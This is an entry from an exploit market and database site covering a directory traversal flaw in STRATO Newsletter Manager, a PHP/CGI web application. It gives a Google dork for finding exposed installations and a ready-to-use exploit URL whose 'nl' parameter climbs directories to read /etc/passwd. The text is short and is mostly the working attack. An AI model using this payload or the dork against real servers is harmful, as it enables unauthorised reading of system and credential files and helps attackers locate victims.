[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

STRATO Newsletter Manager Directory Traversal

Author
Zero X
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-18169
Category
web applications
Date add
01-05-2012
Platform
php
STRATO Newsletter Manager is vulnerable against Directory Traversal
 
Vendor: www.strato-cgi.de
 
Google Dork: inurl:"newsletter.php.cgi"
 
 
Exploit:
 
http://server/cgi-bin/newsletter.php.cgi?PHPSESSID=af92ed633ae0d06d1e24d22520f709f7&action=nl_show&nl=../../../../../../../../../../../../../../etc/passwd
 
Greetz Zero X



#  0day.today [2024-11-15]  #